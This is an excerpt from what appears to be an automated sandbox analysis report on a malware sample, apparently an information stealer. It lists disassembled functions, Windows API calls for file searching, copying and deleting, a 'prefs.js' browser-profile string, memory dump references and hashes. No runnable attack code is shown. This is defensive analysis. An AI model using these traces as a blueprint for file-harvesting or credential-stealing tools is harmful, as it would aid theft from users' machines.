                                                                                    • Opcode ID: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                    • Instruction ID: da3345c658696dc960ed803474ad9b59b03e09f7687d347e1d0c588f20f2f450
                                                                                    • Opcode Fuzzy Hash: 4559a2751c43def235363665869aa0b92e5680d670ebeacc1df313f03f1736d8
                                                                                    • Instruction Fuzzy Hash: DBA16FB5A40218ABDB74DFA4DC84FEE737AFF59304F044588A60D96240DB759B88CF62
                                                                                    Function 00414570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00414580
                                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00414587
                                                                                    • wsprintfA.USER32 ref: 004145A6
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004145BD
                                                                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 004145EB
                                                                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414601
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041468B
                                                                                    • FindClose.KERNEL32(000000FF), ref: 004146A0
                                                                                    • lstrcatA.KERNEL32(?,02E35C40,?,00000104), ref: 004146C5
                                                                                    • lstrcatA.KERNEL32(?,02E3A410), ref: 004146D8
                                                                                    • lstrlenA.KERNEL32(?), ref: 004146E5
                                                                                    • lstrlenA.KERNEL32(?), ref: 004146F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocCloseFirstNextProcesswsprintf
                                                                                    • String ID: %s\%s$%s\*
                                                                                    • API String ID: 13328894-2848263008
                                                                                    • Opcode ID: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                    • Instruction ID: 82eaf0d031878973a8df5e9a00467f3300e65aa4f81b4767f6d66ede98fc483b
                                                                                    • Opcode Fuzzy Hash: 6e0b2a7f719afdb9f67bf6bddbb53f06d515f99307fed51ad2247f5638f38586
                                                                                    • Instruction Fuzzy Hash: 195177B5950218ABC720EBB0DC89FEE737DAB54304F40458DB60996190EB789BC58F96
                                                                                    Function 02D24B77 Relevance: 27.2, APIs: 18, Instructions: 172fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 02D24B93
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D24BAA
                                                                                    • StrCmpCA.SHLWAPI(?,00420FDC), ref: 02D24BD8
                                                                                    • StrCmpCA.SHLWAPI(?,00420FE0), ref: 02D24BEE
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D24DE4
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D24DF9
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 180737720-0
                                                                                    • Opcode ID: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                                                    • Instruction ID: e47528a8e7cefca33b58767a8586ad28846c411ba6a35f1ddb9bd2f4ac75c37a
                                                                                    • Opcode Fuzzy Hash: 78984cc8b84f1b8f18172e07a0d5b5a7c4859d44debcdf1ecac8b22b5592097a
                                                                                    • Instruction Fuzzy Hash: 8B6164B6940218BBCB24EBE0DD44FEA73BDFF59700F444588A60992140EB75AB49CFA1
                                                                                    Function 02D1C0D7 Relevance: 26.2, APIs: 17, Instructions: 675fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00420B32,00420B2B,00000000,?,?,?,004213F4,00420B2A), ref: 02D1C15C
                                                                                    • StrCmpCA.SHLWAPI(?,004213F8), ref: 02D1C1B4
                                                                                    • StrCmpCA.SHLWAPI(?,004213FC), ref: 02D1C1CA
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1CA26
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1CA38
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                    • Instruction ID: f9f95880bfd2bdb402b7e391b532c307f618052ff39f10be8c3d6b202444640c
                                                                                    • Opcode Fuzzy Hash: da467dc7648e693f4c6cd575beccc027074fc99b58ba44c993b0283215006001
                                                                                    • Instruction Fuzzy Hash: B1422072910124EBCF14FBA0DD95EED737AEFA4704F404169A50AA6690EE349F4CCFA1
                                                                                    Function 00413EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 00413EC3
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00413EDA
                                                                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 00413F08
                                                                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 00413F1E
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0041406C
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00414081
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID: %s\%s
                                                                                    • API String ID: 180737720-4073750446
                                                                                    • Opcode ID: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                    • Instruction ID: d668781d41669175768d5c9beeab67687ce79b442868c28804f29fd14ebf2a74
                                                                                    • Opcode Fuzzy Hash: 08d8b5707085556954652948dce7410593c86d1cefa4e3426e9ef0f3fe249a5a
                                                                                    • Instruction Fuzzy Hash: 475173B6910218BBCB24FBB0DC85FEA737DBB48304F40458DB61996180EB79DB858F95
                                                                                    Function 02D247D7 Relevance: 22.6, APIs: 15, Instructions: 137stringmemoryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 02D247E7
                                                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02D247EE
                                                                                    • wsprintfA.USER32 ref: 02D2480D
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D24824
                                                                                    • StrCmpCA.SHLWAPI(?,00420FC4), ref: 02D24852
                                                                                    • StrCmpCA.SHLWAPI(?,00420FC8), ref: 02D24868
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D248F2
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D24907
                                                                                    • lstrcat.KERNEL32(?,0064A524), ref: 02D2492C
                                                                                    • lstrcat.KERNEL32(?,0064A22C), ref: 02D2493F
                                                                                    • lstrlen.KERNEL32(?), ref: 02D2494C
                                                                                    • lstrlen.KERNEL32(?), ref: 02D2495D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 671575355-0
                                                                                    • Opcode ID: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                    • Instruction ID: c28f25d971c7b2b6c439473762ef40418922052af9e561dd56ed6b5d7b35088d
                                                                                    • Opcode Fuzzy Hash: 30bce43db2ecf0344ca22bb06d90d35447f3f69f35e59fe64c42277d0c46a2d3
                                                                                    • Instruction Fuzzy Hash: AE5166B9550218ABC724EBB0DD88FED737DEF68700F404588A64996290DB74DB89CFA1
                                                                                    Function 02D24107 Relevance: 18.1, APIs: 12, Instructions: 133fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 02D2412A
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D24141
                                                                                    • StrCmpCA.SHLWAPI(?,00420FAC), ref: 02D2416F
                                                                                    • StrCmpCA.SHLWAPI(?,00420FB0), ref: 02D24185
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D242D3
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D242E8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 180737720-0
                                                                                    • Opcode ID: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                    • Instruction ID: 0a1f56b13a10ba51689d21a6f61a96bbbf138a3a68440043282f0633e8b2c6a3
                                                                                    • Opcode Fuzzy Hash: 1ae905db5480c4bbf44b7bf6a61368e664d5da2e6ab4683df7d46ab6fe3d119e
                                                                                    • Instruction Fuzzy Hash: 5A5140B5940228BBCB24EBB0DD85EEA737DFB54304F40458CB64992140DB75DB89CFA5
                                                                                    Function 0040ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 0040ED3E
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 0040ED55
                                                                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 0040EDAB
                                                                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 0040EDC1
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040F2AE
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040F2C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID: %s\*.*
                                                                                    • API String ID: 180737720-1013718255
                                                                                    • Opcode ID: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                    • Instruction ID: 3007dda49b16e6c87372febce5c45cbfe381bf5ef72a3521d52464c3f4e34f22
                                                                                    • Opcode Fuzzy Hash: 17c01f8448e3f6aceff949048b193885a00d9ad3e9dcc46d8aed4f84564bc9ce
                                                                                    • Instruction Fuzzy Hash: 41E13571912118AADB14FB61CD51EEE7338AF54314F4045EEB40A62092EF386FDACF69
                                                                                    Function 0040DE10 Relevance: 16.1, APIs: 7, Strings: 2, Instructions: 370fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00420C2E), ref: 0040DE5E
                                                                                    • StrCmpCA.SHLWAPI(?,004214C8), ref: 0040DEAE
                                                                                    • StrCmpCA.SHLWAPI(?,004214CC), ref: 0040DEC4
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040E3E0
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040E3F2
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                                                                    • String ID: 4@$\*.*
                                                                                    • API String ID: 2325840235-1993203227
                                                                                    • Opcode ID: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                    • Instruction ID: cfdc3591377451865113f0b5848cbea5bd15bf7eccde512516250cd90852f391
                                                                                    • Opcode Fuzzy Hash: 808ac54ebf540463c673b75c037e1199791dcd6b6de971305d57ec6faa9f6a30
                                                                                    • Instruction Fuzzy Hash: 5CF1D0718111189ADB15FB61DD95EEE7338AF14314F8045EFA00A62091EF386BDACF69
                                                                                    Function 0040F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004215B8,00420D96), ref: 0040F71E
                                                                                    • StrCmpCA.SHLWAPI(?,004215BC), ref: 0040F76F
                                                                                    • StrCmpCA.SHLWAPI(?,004215C0), ref: 0040F785
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040FAB1
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040FAC3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID: prefs.js
                                                                                    • API String ID: 3334442632-3783873740
                                                                                    • Opcode ID: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                    • Instruction ID: 03b4e3240ed1b335229faca8164051f94e7388f89c5e809ad56520da5e6b4575
                                                                                    • Opcode Fuzzy Hash: 1e3647e3f7a982ad908f2651c845e7cc1bf8978409dfaa1a6776eae6255cbf84
                                                                                    • Instruction Fuzzy Hash: B0B194719011089BCB24FF61DD51FEE7379AF54304F4081BEA40A96191EF389B9ACF9A
                                                                                    Function 004016D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0042511C,?,00401F2C,?,004251C4,?,?,00000000,?,00000000), ref: 00401923
                                                                                    • StrCmpCA.SHLWAPI(?,0042526C), ref: 00401973
                                                                                    • StrCmpCA.SHLWAPI(?,00425314), ref: 00401989
                                                                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00401D40
                                                                                    • DeleteFileA.KERNEL32(00000000), ref: 00401DCA
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00401E20
                                                                                    • FindClose.KERNEL32(000000FF), ref: 00401E32
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                                                                    • String ID: \*.*
                                                                                    • API String ID: 1415058207-1173974218
                                                                                    • Opcode ID: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                    • Instruction ID: 47de987318eafb428d6e9afc63df3879dd5ba7490b623eb573f4dfe72a2f4575
                                                                                    • Opcode Fuzzy Hash: 262c42444cbb4c7113c8ff6840b6909aa1d326ae395afc5a71cd8ea782e15d4f
                                                                                    • Instruction Fuzzy Hash: 641260719111189BCB15FB61CD96EEE7338AF14314F4045AEB10A62091EF386FDACFA9
                                                                                    Function 02D1EF87 Relevance: 13.9, APIs: 9, Instructions: 369fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • wsprintfA.USER32 ref: 02D1EFA5
                                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 02D1EFBC
                                                                                    • StrCmpCA.SHLWAPI(?,00421538), ref: 02D1F012
                                                                                    • StrCmpCA.SHLWAPI(?,0042153C), ref: 02D1F028
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1F515
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1F52A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: Find$File$CloseFirstNextwsprintf
                                                                                    • String ID:
                                                                                    • API String ID: 180737720-0
                                                                                    • Opcode ID: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                    • Instruction ID: eacc1ef12e4842d4242f22260742553279875a37b1cbd44ac00ee720a6f287ba
                                                                                    • Opcode Fuzzy Hash: 5017a4ae4b27de286babc421e1f90f6b26d6cd092db73d8e186e82182fbe0c2c
                                                                                    • Instruction Fuzzy Hash: EAE1CE71911228EADB58EB60DD50EEE733AEF64704F4041D9A50A62591EF306F8DCF61
                                                                                    Function 02D1DCE7 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 02D2A9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 02D2A9EF
                                                                                      • Part of subcall function 02D2AB87: lstrcpy.KERNEL32(00000000,?), ref: 02D2ABD9
                                                                                      • Part of subcall function 02D2AB87: lstrcat.KERNEL32(00000000), ref: 02D2ABE9
                                                                                      • Part of subcall function 02D2AC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 02D2AC2C
                                                                                      • Part of subcall function 02D2AC17: lstrcpy.KERNEL32(00000000), ref: 02D2AC6B
                                                                                      • Part of subcall function 02D2AC17: lstrcat.KERNEL32(00000000,00000000), ref: 02D2AC79
                                                                                      • Part of subcall function 02D2AB07: lstrcpy.KERNEL32(?,00420E17), ref: 02D2AB6C
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 02D1DD52
                                                                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 02D1DD9A
                                                                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 02D1DDB0
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 02D1E033
                                                                                    • FindClose.KERNEL32(000000FF), ref: 02D1E045
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2054417626.0000000002D10000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D10000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_2d10000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                    • Instruction ID: 3bcfb3ed79e880f07c006f19805891beee7c562dd372df7fd577a2bd8fd1e14c
                                                                                    • Opcode Fuzzy Hash: 19e1283fff7b9399e04994cea590238412c6d56de050716b623985b6cf8af604
                                                                                    • Instruction Fuzzy Hash: 4A912272900224EBCB14FBB0ED55AED737AEFA5304F404568A94A96640EF349F5CCFA1
                                                                                    Function 0040DA80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                                                                      • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                                                                      • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                                                                      • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                                                                      • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                                                                      • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                                                                      • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004214B0,00420C2A), ref: 0040DAEB
                                                                                    • StrCmpCA.SHLWAPI(?,004214B4), ref: 0040DB33
                                                                                    • StrCmpCA.SHLWAPI(?,004214B8), ref: 0040DB49
                                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0040DDCC
                                                                                    • FindClose.KERNEL32(000000FF), ref: 0040DDDE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2053079925.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004B1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004BD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.00000000004E2000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2053079925.000000000065C000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_A8A9.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                                                                    • String ID:
                                                                                    • API String ID: 3334442632-0
                                                                                    • Opcode ID: cb963d4a19e0741f27c6405a3099effca6cff126aea0ca95f281292b31be4223
